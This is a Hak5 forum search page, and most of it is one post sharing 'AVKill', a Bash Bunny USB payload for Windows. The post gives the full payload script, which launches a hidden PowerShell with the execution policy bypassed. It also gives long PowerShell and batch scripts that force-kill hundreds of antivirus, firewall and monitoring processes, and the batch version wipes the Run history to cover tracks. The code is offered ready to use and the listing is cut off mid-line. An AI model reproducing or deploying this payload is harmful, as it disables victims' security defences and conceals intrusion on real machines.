Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'payload'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Packet Squirrel
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 38 results

  1. [PAYLOAD] AVKill

    Eh, I haven't been too active in awhile due to work so I figured I'd post one from my collection. AVKill - BashBunny -Ar1k88 This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny. Payload.txt #!/bin/bash # # Title: AVKill # Author: Ar1k88 # Version: 1.2.1 # Target: Windows 7-10 # # O===================O=================== # | Magenta | Setup # | Yellow | Excuting Script # | Green/Success | Script Completed # | Cyan | Cleaning Up/ # | | | Shutting down # | OFF | Ready for Removal # O======================================= # # This is based off of avkill.rb from metasploit framework, I managed to just take the processes out, # and convert them to both .cmd format AND .ps1 format. So pick your poison guys. Have fun! # -Ar1k88 # Setup BashBunny LED M SOLID source bunny_helpers.sh Q DELAY 5000 # Set BashBunny and Execute AVKill ATTACKMODE HID STORAGE LED Y VERYFAST Q GUI r Q DELAY 1000 Q STRING powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\start.cmd')" Q ENTER LED SUCCESS Q DELAY 30000 # Starting syncing and shutdown sync -o LED C VERYFAST Q DELAY 3000 # Shutdown Command for BashBunny LED C SOLID shutdown 0 AVKill.ps1 Stop-Process -ProcessName AAWTray.exe -Force Stop-Process -ProcessName Ad-Aware.exe -Force Stop-Process -ProcessName MSASCui.exe -Force Stop-Process -ProcessName _avp32.exe -Force Stop-Process -ProcessName _avpcc.exe -Force Stop-Process -ProcessName _avpm.exe -Force Stop-Process -ProcessName aAvgApi.exe -Force Stop-Process -ProcessName ackwin32.exe -Force Stop-Process -ProcessName adaware.exe -Force Stop-Process -ProcessName advxdwin.exe -Force Stop-Process -ProcessName agentsvr.exe -Force Stop-Process -ProcessName agentw.exe -Force Stop-Process -ProcessName alertsvc.exe -Force Stop-Process -ProcessName alevir.exe -Force Stop-Process -ProcessName alogserv.exe -Force Stop-Process -ProcessName amon9x.exe -Force Stop-Process -ProcessName anti-trojan.exe -Force Stop-Process -ProcessName antivirus.exe -Force Stop-Process -ProcessName ants.exe -Force Stop-Process -ProcessName apimonitor.exe -Force Stop-Process -ProcessName aplica32.exe -Force Stop-Process -ProcessName apvxdwin.exe -Force Stop-Process -ProcessName arr.exe -Force Stop-Process -ProcessName atcon.exe -Force Stop-Process -ProcessName atguard.exe -Force Stop-Process -ProcessName atro55en.exe -Force Stop-Process -ProcessName atupdater.exe -Force Stop-Process -ProcessName atwatch.exe -Force Stop-Process -ProcessName au.exe -Force Stop-Process -ProcessName aupdate.exe -Force Stop-Process -ProcessName auto-protect.nav80try.exe -Force Stop-Process -ProcessName autodown.exe -Force Stop-Process -ProcessName autotrace.exe -Force Stop-Process -ProcessName autoupdate.exe -Force Stop-Process -ProcessName avconsol.exe -Force Stop-Process -ProcessName ave32.exe -Force Stop-Process -ProcessName avgcc32.exe -Force Stop-Process -ProcessName avgctrl.exe -Force Stop-Process -ProcessName avgemc.exe -Force Stop-Process -ProcessName avgnt.exe -Force Stop-Process -ProcessName avgrsx.exe -Force Stop-Process -ProcessName avgserv.exe -Force Stop-Process -ProcessName avgserv9.exe -Force Stop-Process -ProcessName avguard.exe -Force Stop-Process -ProcessName avgw.exe -Force Stop-Process -ProcessName avkpop.exe -Force Stop-Process -ProcessName avkserv.exe -Force Stop-Process -ProcessName avkservice.exe -Force Stop-Process -ProcessName avkwctl9.exe -Force Stop-Process -ProcessName avltmain.exe -Force Stop-Process -ProcessName avnt.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp32.exe -Force Stop-Process -ProcessName avpcc.exe -Force Stop-Process -ProcessName avpdos32.exe -Force Stop-Process -ProcessName avpm.exe -Force Stop-Process -ProcessName avptc32.exe -Force Stop-Process -ProcessName avpupd.exe -Force Stop-Process -ProcessName avsched32.exe -Force Stop-Process -ProcessName avsynmgr.exe -Force Stop-Process -ProcessName avwin.exe -Force Stop-Process -ProcessName avwin95.exe -Force Stop-Process -ProcessName avwinnt.exe -Force Stop-Process -ProcessName avwupd.exe -Force Stop-Process -ProcessName avwupd32.exe -Force Stop-Process -ProcessName avwupsrv.exe -Force Stop-Process -ProcessName avxmonitor9x.exe -Force Stop-Process -ProcessName avxmonitornt.exe -Force Stop-Process -ProcessName avxquar.exe -Force Stop-Process -ProcessName backweb.exe -Force Stop-Process -ProcessName bargains.exe -Force Stop-Process -ProcessName bd_professional.exe -Force Stop-Process -ProcessName beagle.exe -Force Stop-Process -ProcessName belt.exe -Force Stop-Process -ProcessName bidef.exe -Force Stop-Process -ProcessName bidserver.exe -Force Stop-Process -ProcessName bipcp.exe -Force Stop-Process -ProcessName bipcpevalsetup.exe -Force Stop-Process -ProcessName bisp.exe -Force Stop-Process -ProcessName blackd.exe -Force Stop-Process -ProcessName blackice.exe -Force Stop-Process -ProcessName blink.exe -Force Stop-Process -ProcessName blss.exe -Force Stop-Process -ProcessName bootconf.exe -Force Stop-Process -ProcessName bootwarn.exe -Force Stop-Process -ProcessName borg2.exe -Force Stop-Process -ProcessName bpc.exe -Force Stop-Process -ProcessName brasil.exe -Force Stop-Process -ProcessName bs120.exe -Force Stop-Process -ProcessName bundle.exe -Force Stop-Process -ProcessName bvt.exe -Force Stop-Process -ProcessName ccapp.exe -Force Stop-Process -ProcessName ccevtmgr.exe -Force Stop-Process -ProcessName ccpxysvc.exe -Force Stop-Process -ProcessName cdp.exe -Force Stop-Process -ProcessName cfd.exe -Force Stop-Process -ProcessName cfgwiz.exe -Force Stop-Process -ProcessName cfiadmin.exe -Force Stop-Process -ProcessName cfiaudit.exe -Force Stop-Process -ProcessName cfinet.exe -Force Stop-Process -ProcessName cfinet32.exe -Force Stop-Process -ProcessName claw95.exe -Force Stop-Process -ProcessName claw95cf.exe -Force Stop-Process -ProcessName clean.exe -Force Stop-Process -ProcessName cleaner.exe -Force Stop-Process -ProcessName cleaner3.exe -Force Stop-Process -ProcessName cleanpc.exe -Force Stop-Process -ProcessName click.exe -Force Stop-Process -ProcessName cmd.exe -Force Stop-Process -ProcessName cmd32.exe -Force Stop-Process -ProcessName cmesys.exe -Force Stop-Process -ProcessName cmgrdian.exe -Force Stop-Process -ProcessName cmon016.exe -Force Stop-Process -ProcessName connectionmonitor.exe -Force Stop-Process -ProcessName cpd.exe -Force Stop-Process -ProcessName cpf9x206.exe -Force Stop-Process -ProcessName cpfnt206.exe -Force Stop-Process -ProcessName ctrl.exe -Force Stop-Process -ProcessName cv.exe -Force Stop-Process -ProcessName cwnb181.exe -Force Stop-Process -ProcessName cwntdwmo.exe -Force Stop-Process -ProcessName datemanager.exe -Force Stop-Process -ProcessName dcomx.exe -Force Stop-Process -ProcessName defalert.exe -Force Stop-Process -ProcessName defscangui.exe -Force Stop-Process -ProcessName defwatch.exe -Force Stop-Process -ProcessName deputy.exe -Force Stop-Process -ProcessName divx.exe -Force Stop-Process -ProcessName dllcache.exe -Force Stop-Process -ProcessName dllreg.exe -Force Stop-Process -ProcessName doors.exe -Force Stop-Process -ProcessName dpf.exe -Force Stop-Process -ProcessName dpfsetup.exe -Force Stop-Process -ProcessName dpps2.exe -Force Stop-Process -ProcessName drwatson.exe -Force Stop-Process -ProcessName drweb32.exe -Force Stop-Process -ProcessName drwebupw.exe -Force Stop-Process -ProcessName dssagent.exe -Force Stop-Process -ProcessName dvp95.exe -Force Stop-Process -ProcessName dvp95_0.exe -Force Stop-Process -ProcessName ecengine.exe -Force Stop-Process -ProcessName efpeadm.exe -Force Stop-Process -ProcessName emsw.exe -Force Stop-Process -ProcessName ent.exe -Force Stop-Process -ProcessName esafe.exe -Force Stop-Process -ProcessName escanhnt.exe -Force Stop-Process -ProcessName escanv95.exe -Force Stop-Process -ProcessName espwatch.exe -Force Stop-Process -ProcessName ethereal.exe -Force Stop-Process -ProcessName etrustcipe.exe -Force Stop-Process -ProcessName evpn.exe -Force Stop-Process -ProcessName exantivirus-cnet.exe -Force Stop-Process -ProcessName exe.avxw.exe -Force Stop-Process -ProcessName expert.exe -Force Stop-Process -ProcessName explore.exe -Force Stop-Process -ProcessName f-agnt95.exe -Force Stop-Process -ProcessName f-prot.exe -Force Stop-Process -ProcessName f-prot95.exe -Force Stop-Process -ProcessName f-stopw.exe -Force Stop-Process -ProcessName fameh32.exe -Force Stop-Process -ProcessName fast.exe -Force Stop-Process -ProcessName fch32.exe -Force Stop-Process -ProcessName fih32.exe -Force Stop-Process -ProcessName findviru.exe -Force Stop-Process -ProcessName firewall.exe -Force Stop-Process -ProcessName fnrb32.exe -Force Stop-Process -ProcessName fp-win.exe -Force Stop-Process -ProcessName fp-win_trial.exe -Force Stop-Process -ProcessName fprot.exe -Force Stop-Process -ProcessName frw.exe -Force Stop-Process -ProcessName fsaa.exe -Force Stop-Process -ProcessName fsav.exe -Force Stop-Process -ProcessName fsav32.exe -Force Stop-Process -ProcessName fsav530stbyb.exe -Force Stop-Process -ProcessName fsav530wtbyb.exe -Force Stop-Process -ProcessName fsav95.exe -Force Stop-Process -ProcessName fsgk32.exe -Force Stop-Process -ProcessName fsm32.exe -Force Stop-Process -ProcessName fsma32.exe -Force Stop-Process -ProcessName fsmb32.exe -Force Stop-Process -ProcessName gator.exe -Force Stop-Process -ProcessName gbmenu.exe -Force Stop-Process -ProcessName gbpoll.exe -Force Stop-Process -ProcessName generics.exe -Force Stop-Process -ProcessName gmt.exe -Force Stop-Process -ProcessName guard.exe -Force Stop-Process -ProcessName guarddog.exe -Force Stop-Process -ProcessName hacktracersetup.exe -Force Stop-Process -ProcessName hbinst.exe -Force Stop-Process -ProcessName hbsrv.exe -Force Stop-Process -ProcessName hotactio.exe -Force Stop-Process -ProcessName hotpatch.exe -Force Stop-Process -ProcessName htlog.exe -Force Stop-Process -ProcessName htpatch.exe -Force Stop-Process -ProcessName hwpe.exe -Force Stop-Process -ProcessName hxdl.exe -Force Stop-Process -ProcessName hxiul.exe -Force Stop-Process -ProcessName iamapp.exe -Force Stop-Process -ProcessName iamserv.exe -Force Stop-Process -ProcessName iamstats.exe -Force Stop-Process -ProcessName ibmasn.exe -Force Stop-Process -ProcessName ibmavsp.exe -Force Stop-Process -ProcessName icload95.exe -Force Stop-Process -ProcessName icloadnt.exe -Force Stop-Process -ProcessName icmon.exe -Force Stop-Process -ProcessName icsupp95.exe -Force Stop-Process -ProcessName icsuppnt.exe -Force Stop-Process -ProcessName idle.exe -Force Stop-Process -ProcessName iedll.exe -Force Stop-Process -ProcessName iedriver.exe -Force Stop-Process -ProcessName iexplorer.exe -Force Stop-Process -ProcessName iface.exe -Force Stop-Process -ProcessName ifw2000.exe -Force Stop-Process -ProcessName inetlnfo.exe -Force Stop-Process -ProcessName infus.exe -Force Stop-Process -ProcessName infwin.exe -Force Stop-Process -ProcessName init.exe -Force Stop-Process -ProcessName intdel.exe -Force Stop-Process -ProcessName intren.exe -Force Stop-Process -ProcessName iomon98.exe -Force Stop-Process -ProcessName istsvc.exe -Force Stop-Process -ProcessName jammer.exe -Force Stop-Process -ProcessName jdbgmrg.exe -Force Stop-Process -ProcessName jedi.exe -Force Stop-Process -ProcessName kavlite40eng.exe -Force Stop-Process -ProcessName kavpers40eng.exe -Force Stop-Process -ProcessName kavpf.exe -Force Stop-Process -ProcessName kazza.exe -Force Stop-Process -ProcessName keenvalue.exe -Force Stop-Process -ProcessName kerio-pf-213-en-win.exe -Force Stop-Process -ProcessName kerio-wrl-421-en-win.exe -Force Stop-Process -ProcessName kerio-wrp-421-en-win.exe -Force Stop-Process -ProcessName kernel32.exe -Force Stop-Process -ProcessName killprocesssetup161.exe -Force Stop-Process -ProcessName launcher.exe -Force Stop-Process -ProcessName ldnetmon.exe -Force Stop-Process -ProcessName ldpro.exe -Force Stop-Process -ProcessName ldpromenu.exe -Force Stop-Process -ProcessName ldscan.exe -Force Stop-Process -ProcessName lnetinfo.exe -Force Stop-Process -ProcessName loader.exe -Force Stop-Process -ProcessName localnet.exe -Force Stop-Process -ProcessName lockdown.exe -Force Stop-Process -ProcessName lockdown2000.exe -Force Stop-Process -ProcessName lookout.exe -Force Stop-Process -ProcessName lordpe.exe -Force Stop-Process -ProcessName lsetup.exe -Force Stop-Process -ProcessName luall.exe -Force Stop-Process -ProcessName luau.exe -Force Stop-Process -ProcessName lucomserver.exe -Force Stop-Process -ProcessName luinit.exe -Force Stop-Process -ProcessName luspt.exe -Force Stop-Process -ProcessName mapisvc32.exe -Force Stop-Process -ProcessName mcagent.exe -Force Stop-Process -ProcessName mcmnhdlr.exe -Force Stop-Process -ProcessName mcshield.exe -Force Stop-Process -ProcessName mctool.exe -Force Stop-Process -ProcessName mcupdate.exe -Force Stop-Process -ProcessName mcvsrte.exe -Force Stop-Process -ProcessName mcvsshld.exe -Force Stop-Process -ProcessName md.exe -Force Stop-Process -ProcessName mfin32.exe -Force Stop-Process -ProcessName mfw2en.exe -Force Stop-Process -ProcessName mfweng3.02d30.exe -Force Stop-Process -ProcessName mgavrtcl.exe -Force Stop-Process -ProcessName mgavrte.exe -Force Stop-Process -ProcessName mghtml.exe -Force Stop-Process -ProcessName mgui.exe -Force Stop-Process -ProcessName minilog.exe -Force Stop-Process -ProcessName mmod.exe -Force Stop-Process -ProcessName monitor.exe -Force Stop-Process -ProcessName moolive.exe -Force Stop-Process -ProcessName mostat.exe -Force Stop-Process -ProcessName mpfagent.exe -Force Stop-Process -ProcessName mpfservice.exe -Force Stop-Process -ProcessName mpftray.exe -Force Stop-Process -ProcessName mrflux.exe -Force Stop-Process -ProcessName msapp.exe -Force Stop-Process -ProcessName msbb.exe -Force Stop-Process -ProcessName msblast.exe -Force Stop-Process -ProcessName mscache.exe -Force Stop-Process -ProcessName msccn32.exe -Force Stop-Process -ProcessName mscman.exe -Force Stop-Process -ProcessName msconfig.exe -Force Stop-Process -ProcessName msdm.exe -Force Stop-Process -ProcessName msdos.exe -Force Stop-Process -ProcessName msiexec16.exe -Force Stop-Process -ProcessName msinfo32.exe -Force Stop-Process -ProcessName mslaugh.exe -Force Stop-Process -ProcessName msmgt.exe -Force Stop-Process -ProcessName msmsgri32.exe -Force Stop-Process -ProcessName mssmmc32.exe -Force Stop-Process -ProcessName mssys.exe -Force Stop-Process -ProcessName msvxd.exe -Force Stop-Process -ProcessName mu0311ad.exe -Force Stop-Process -ProcessName mwatch.exe -Force Stop-Process -ProcessName n32scanw.exe -Force Stop-Process -ProcessName nav.exe -Force Stop-Process -ProcessName navap.navapsvc.exe -Force Stop-Process -ProcessName navapsvc.exe -Force Stop-Process -ProcessName navapw32.exe -Force Stop-Process -ProcessName navdx.exe -Force Stop-Process -ProcessName navlu32.exe -Force Stop-Process -ProcessName navnt.exe -Force Stop-Process -ProcessName navstub.exe -Force Stop-Process -ProcessName navw32.exe -Force Stop-Process -ProcessName navwnt.exe -Force Stop-Process -ProcessName nc2000.exe -Force Stop-Process -ProcessName ncinst4.exe -Force Stop-Process -ProcessName ndd32.exe -Force Stop-Process -ProcessName neomonitor.exe -Force Stop-Process -ProcessName neowatchlog.exe -Force Stop-Process -ProcessName netarmor.exe -Force Stop-Process -ProcessName netd32.exe -Force Stop-Process -ProcessName netinfo.exe -Force Stop-Process -ProcessName netmon.exe -Force Stop-Process -ProcessName netscanpro.exe -Force Stop-Process -ProcessName netspyhunter-1.2.exe -Force Stop-Process -ProcessName netstat.exe -Force Stop-Process -ProcessName netutils.exe -Force Stop-Process -ProcessName nisserv.exe -Force Stop-Process -ProcessName nisum.exe -Force Stop-Process -ProcessName nmain.exe -Force Stop-Process -ProcessName nod32.exe -Force Stop-Process -ProcessName normist.exe -Force Stop-Process -ProcessName norton_internet_secu_3.0_407.exe -Force Stop-Process -ProcessName notstart.exe -Force Stop-Process -ProcessName npf40_tw_98_nt_me_2k.exe -Force Stop-Process -ProcessName npfmessenger.exe -Force Stop-Process -ProcessName nprotect.exe -Force Stop-Process -ProcessName npscheck.exe -Force Stop-Process -ProcessName npssvc.exe -Force Stop-Process -ProcessName nsched32.exe -Force Stop-Process -ProcessName nssys32.exe -Force Stop-Process -ProcessName nstask32.exe -Force Stop-Process -ProcessName nsupdate.exe -Force Stop-Process -ProcessName nt.exe -Force Stop-Process -ProcessName ntrtscan.exe -Force Stop-Process -ProcessName ntvdm.exe -Force Stop-Process -ProcessName ntxconfig.exe -Force Stop-Process -ProcessName nui.exe -Force Stop-Process -ProcessName nupgrade.exe -Force Stop-Process -ProcessName nvarch16.exe -Force Stop-Process -ProcessName nvc95.exe -Force Stop-Process -ProcessName nvsvc32.exe -Force Stop-Process -ProcessName nwinst4.exe -Force Stop-Process -ProcessName nwservice.exe -Force Stop-Process -ProcessName nwtool16.exe -Force Stop-Process -ProcessName ollydbg.exe -Force Stop-Process -ProcessName onsrvr.exe -Force Stop-Process -ProcessName optimize.exe -Force Stop-Process -ProcessName ostronet.exe -Force Stop-Process -ProcessName otfix.exe -Force Stop-Process -ProcessName outpost.exe -Force Stop-Process -ProcessName outpostinstall.exe -Force Stop-Process -ProcessName outpostproinstall.exe -Force Stop-Process -ProcessName padmin.exe -Force Stop-Process -ProcessName panixk.exe -Force Stop-Process -ProcessName patch.exe -Force Stop-Process -ProcessName pavcl.exe -Force Stop-Process -ProcessName pavproxy.exe -Force Stop-Process -ProcessName pavsched.exe -Force Stop-Process -ProcessName pavw.exe -Force Stop-Process -ProcessName pccwin98.exe -Force Stop-Process -ProcessName pcfwallicon.exe -Force Stop-Process -ProcessName pcip10117_0.exe -Force Stop-Process -ProcessName pcscan.exe -Force Stop-Process -ProcessName pdsetup.exe -Force Stop-Process -ProcessName periscope.exe -Force Stop-Process -ProcessName persfw.exe -Force Stop-Process -ProcessName perswf.exe -Force Stop-Process -ProcessName pf2.exe -Force Stop-Process -ProcessName pfwadmin.exe -Force Stop-Process -ProcessName pgmonitr.exe -Force Stop-Process -ProcessName pingscan.exe -Force Stop-Process -ProcessName platin.exe -Force Stop-Process -ProcessName pop3trap.exe -Force Stop-Process -ProcessName poproxy.exe -Force Stop-Process -ProcessName popscan.exe -Force Stop-Process -ProcessName portdetective.exe -Force Stop-Process -ProcessName portmonitor.exe -Force Stop-Process -ProcessName powerscan.exe -Force Stop-Process -ProcessName ppinupdt.exe -Force Stop-Process -ProcessName pptbc.exe -Force Stop-Process -ProcessName ppvstop.exe -Force Stop-Process -ProcessName prizesurfer.exe -Force Stop-Process -ProcessName prmt.exe -Force Stop-Process -ProcessName prmvr.exe -Force Stop-Process -ProcessName procdump.exe -Force Stop-Process -ProcessName processmonitor.exe -Force Stop-Process -ProcessName procexplorerv1.0.exe -Force Stop-Process -ProcessName programauditor.exe -Force Stop-Process -ProcessName proport.exe -Force Stop-Process -ProcessName protectx.exe -Force Stop-Process -ProcessName pspf.exe -Force Stop-Process -ProcessName purge.exe -Force Stop-Process -ProcessName qconsole.exe -Force Stop-Process -ProcessName qserver.exe -Force Stop-Process -ProcessName rapapp.exe -Force Stop-Process -ProcessName rav7.exe -Force Stop-Process -ProcessName rav7win.exe -Force Stop-Process -ProcessName rav8win32eng.exe -Force Stop-Process -ProcessName ray.exe -Force Stop-Process -ProcessName rb32.exe -Force Stop-Process -ProcessName rcsync.exe -Force Stop-Process -ProcessName realmon.exe -Force Stop-Process -ProcessName reged.exe -Force Stop-Process -ProcessName regedit.exe -Force Stop-Process -ProcessName regedt32.exe -Force Stop-Process -ProcessName rescue.exe -Force Stop-Process -ProcessName rescue32.exe -Force Stop-Process -ProcessName rrguard.exe -Force Stop-Process -ProcessName rshell.exe -Force Stop-Process -ProcessName rtvscan.exe -Force Stop-Process -ProcessName rtvscn95.exe -Force Stop-Process -ProcessName rulaunch.exe -Force Stop-Process -ProcessName run32dll.exe -Force Stop-Process -ProcessName rundll.exe -Force Stop-Process -ProcessName rundll16.exe -Force Stop-Process -ProcessName ruxdll32.exe -Force Stop-Process -ProcessName safeweb.exe -Force Stop-Process -ProcessName sahagent.exe -Force Stop-Process -ProcessName save.exe -Force Stop-Process -ProcessName savenow.exe -Force Stop-Process -ProcessName sbserv.exe -Force Stop-Process -ProcessName sc.exe -Force Stop-Process -ProcessName scam32.exe -Force Stop-Process -ProcessName scan32.exe -Force Stop-Process -ProcessName scan95.exe -Force Stop-Process -ProcessName scanpm.exe -Force Stop-Process -ProcessName scrscan.exe -Force Stop-Process -ProcessName serv95.exe -Force Stop-Process -ProcessName setup_flowprotector_us.exe -Force Stop-Process -ProcessName setupvameeval.exe -Force Stop-Process -ProcessName sfc.exe -Force Stop-Process -ProcessName sgssfw32.exe -Force Stop-Process -ProcessName sh.exe -Force Stop-Process -ProcessName shellspyinstall.exe -Force Stop-Process -ProcessName shn.exe -Force Stop-Process -ProcessName showbehind.exe -Force Stop-Process -ProcessName smc.exe -Force Stop-Process -ProcessName sms.exe -Force Stop-Process -ProcessName smss32.exe -Force Stop-Process -ProcessName soap.exe -Force Stop-Process -ProcessName sofi.exe -Force Stop-Process -ProcessName sperm.exe -Force Stop-Process -ProcessName spf.exe -Force Stop-Process -ProcessName sphinx.exe -Force Stop-Process -ProcessName spoler.exe -Force Stop-Process -ProcessName spoolcv.exe -Force Stop-Process -ProcessName spoolsv32.exe -Force Stop-Process -ProcessName spyxx.exe -Force Stop-Process -ProcessName srexe.exe -Force Stop-Process -ProcessName srng.exe -Force Stop-Process -ProcessName ss3edit.exe -Force Stop-Process -ProcessName ssg_4104.exe -Force Stop-Process -ProcessName ssgrate.exe -Force Stop-Process -ProcessName st2.exe -Force Stop-Process -ProcessName start.exe -Force Stop-Process -ProcessName stcloader.exe -Force Stop-Process -ProcessName supftrl.exe -Force Stop-Process -ProcessName support.exe -Force Stop-Process -ProcessName supporter5.exe -Force Stop-Process -ProcessName svc.exe -Force Stop-Process -ProcessName svchostc.exe -Force Stop-Process -ProcessName svchosts.exe -Force Stop-Process -ProcessName svshost.exe -Force Stop-Process -ProcessName sweep95.exe -Force Stop-Process -ProcessName sweepnet.sweepsrv.sys.swnetsup.exe -Force Stop-Process -ProcessName symproxysvc.exe -Force Stop-Process -ProcessName symtray.exe -Force Stop-Process -ProcessName sysedit.exe -Force Stop-Process -ProcessName system.exe -Force Stop-Process -ProcessName system32.exe -Force Stop-Process -ProcessName sysupd.exe -Force Stop-Process -ProcessName taskmg.exe -Force Stop-Process -ProcessName taskmgr.exe -Force Stop-Process -ProcessName taskmo.exe -Force Stop-Process -ProcessName taskmon.exe -Force Stop-Process -ProcessName taumon.exe -Force Stop-Process -ProcessName tbscan.exe -Force Stop-Process -ProcessName tc.exe -Force Stop-Process -ProcessName tca.exe -Force Stop-Process -ProcessName tcm.exe -Force Stop-Process -ProcessName tds-3.exe -Force Stop-Process -ProcessName tds2-98.exe -Force Stop-Process -ProcessName tds2-nt.exe -Force Stop-Process -ProcessName teekids.exe -Force Stop-Process -ProcessName tfak.exe -Force Stop-Process -ProcessName tfak5.exe -Force Stop-Process -ProcessName tgbob.exe -Force Stop-Process -ProcessName titanin.exe -Force Stop-Process -ProcessName titaninxp.exe -Force Stop-Process -ProcessName tracert.exe -Force Stop-Process -ProcessName trickler.exe -Force Stop-Process -ProcessName trjscan.exe -Force Stop-Process -ProcessName trjsetup.exe -Force Stop-Process -ProcessName trojantrap3.exe -Force Stop-Process -ProcessName tsadbot.exe -Force Stop-Process -ProcessName tvmd.exe -Force Stop-Process -ProcessName tvtmd.exe -Force Stop-Process -ProcessName undoboot.exe -Force Stop-Process -ProcessName updat.exe -Force Stop-Process -ProcessName update.exe -Force Stop-Process -ProcessName upgrad.exe -Force Stop-Process -ProcessName utpost.exe -Force Stop-Process -ProcessName vbcmserv.exe -Force Stop-Process -ProcessName vbcons.exe -Force Stop-Process -ProcessName vbust.exe -Force Stop-Process -ProcessName vbwin9x.exe -Force Stop-Process -ProcessName vbwinntw.exe -Force Stop-Process -ProcessName vcsetup.exe -Force Stop-Process -ProcessName vet32.exe -Force Stop-Process -ProcessName vet95.exe -Force Stop-Process -ProcessName vettray.exe -Force Stop-Process -ProcessName vfsetup.exe -Force Stop-Process -ProcessName vir-help.exe -Force Stop-Process -ProcessName virusmdpersonalfirewall.exe -Force Stop-Process -ProcessName vnlan300.exe -Force Stop-Process -ProcessName vnpc3000.exe -Force Stop-Process -ProcessName vpc32.exe -Force Stop-Process -ProcessName vpc42.exe -Force Stop-Process -ProcessName vpfw30s.exe -Force Stop-Process -ProcessName vptray.exe -Force Stop-Process -ProcessName vscan40.exe -Force Stop-Process -ProcessName vscenu6.02d30.exe -Force Stop-Process -ProcessName vsched.exe -Force Stop-Process -ProcessName vsecomr.exe -Force Stop-Process -ProcessName vshwin32.exe -Force Stop-Process -ProcessName vsisetup.exe -Force Stop-Process -ProcessName vsmain.exe -Force Stop-Process -ProcessName vsmon.exe -Force Stop-Process -ProcessName vsstat.exe -Force Stop-Process -ProcessName vswin9xe.exe -Force Stop-Process -ProcessName vswinntse.exe -Force Stop-Process -ProcessName vswinperse.exe -Force Stop-Process -ProcessName w32dsm89.exe -Force Stop-Process -ProcessName w9x.exe -Force Stop-Process -ProcessName watchdog.exe -Force Stop-Process -ProcessName webdav.exe -Force Stop-Process -ProcessName webscanx.exe -Force Stop-Process -ProcessName webtrap.exe -Force Stop-Process -ProcessName wfindv32.exe -Force Stop-Process -ProcessName whoswatchingme.exe -Force Stop-Process -ProcessName wimmun32.exe -Force Stop-Process -ProcessName win-bugsfix.exe -Force Stop-Process -ProcessName win32.exe -Force Stop-Process -ProcessName win32us.exe -Force Stop-Process -ProcessName winactive.exe -Force Stop-Process -ProcessName window.exe -Force Stop-Process -ProcessName windows.exe -Force Stop-Process -ProcessName wininetd.exe -Force Stop-Process -ProcessName wininitx.exe -Force Stop-Process -ProcessName winlogin.exe -Force Stop-Process -ProcessName winmain.exe -Force Stop-Process -ProcessName winnet.exe -Force Stop-Process -ProcessName winppr32.exe -Force Stop-Process -ProcessName winrecon.exe -Force Stop-Process -ProcessName winservn.exe -Force Stop-Process -ProcessName winssk32.exe -Force Stop-Process -ProcessName winstart.exe -Force Stop-Process -ProcessName winstart001.exe -Force Stop-Process -ProcessName wintsk32.exe -Force Stop-Process -ProcessName winupdate.exe -Force Stop-Process -ProcessName wkufind.exe -Force Stop-Process -ProcessName wnad.exe -Force Stop-Process -ProcessName wnt.exe -Force Stop-Process -ProcessName wradmin.exe -Force Stop-Process -ProcessName wrctrl.exe -Force Stop-Process -ProcessName wsbgate.exe -Force Stop-Process -ProcessName wupdater.exe -Force Stop-Process -ProcessName wupdt.exe -Force Stop-Process -ProcessName wyvernworksfirewall.exe -Force Stop-Process -ProcessName xpf202en.exe -Force Stop-Process -ProcessName zapro.exe -Force Stop-Process -ProcessName zapsetup3001.exe -Force Stop-Process -ProcessName zatutor.exe -Force Stop-Process -ProcessName zonalm2601.exe -Force Stop-Process -ProcessName zonealarm.exe -Force OR AVKill.cmd @echo off cls REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f Taskkill /T /F /IM AAWTray.exe /IM Ad-Aware.exe /IM MSASCui.exe /IM _avp32.exe /IM _avpcc.exe /IM _avpm.exe /IM aAvgApi.exe /IM ackwin32.exe /IM adaware.exe /IM advxdwin.exe Taskkill /T /F /IM agentsvr.exe /IM agentw.exe /IM alertsvc.exe /IM alevir.exe /IM alogserv.exe /IM amon9x.exe /IM anti-trojan.exe /IM antivirus.exe /IM ants.exe /IM apimonitor.exe Taskkill /T /F /IM aplica32.exe /IM apvxdwin.exe /IM arr.exe /IM atcon.exe /IM atguard.exe /IM atro55en.exe /IM atupdater.exe /IM atwatch.exe /IM au.exe /IM aupdate.exe Taskkill /T /F /IM auto-protect.nav80try.exe /IM autodown.exe /IM autotrace.exe /IM autoupdate.exe /IM avconsol.exe /IM ave32.exe /IM avgcc32.exe /IM avgctrl.exe /IM avgemc.exe Taskkill /T /F /IM avgnt.exe /IM avgrsx.exe /IM avgserv.exe /IM avgserv9.exe /IM avguard.exe /IM avgw.exe /IM avkpop.exe /IM avkserv.exe /IM avkservice.exe /IM avkwctl9.exe Taskkill /T /F /IM avltmain.exe /IM avnt.exe /IM avp.exe /IM avp.exe /IM avp32.exe /IM avpcc.exe /IM avpdos32.exe /IM avpm.exe /IM avptc32.exe /IM avpupd.exe /IM avsched32.exe Taskkill /T /F /IM avsynmgr.exe /IM avwin.exe /IM avwin95.exe /IM avwinnt.exe /IM avwupd.exe /IM avwupd32.exe /IM avwupsrv.exe /IM avxmonitor9x.exe /IM avxmonitornt.exe Taskkill /T /F /IM avxquar.exe /IM backweb.exe /IM bargains.exe /IM bd_professional.exe /IM beagle.exe /IM belt.exe /IM bidef.exe /IM bidserver.exe /IM bipcp.exe /IM bipcpevalsetup.exe Taskkill /T /F /IM bisp.exe /IM blackd.exe /IM blackice.exe /IM blink.exe /IM blss.exe /IM bootconf.exe /IM bootwarn.exe /IM borg2.exe /IM bpc.exe /IM brasil.exe /IM bs120.exe 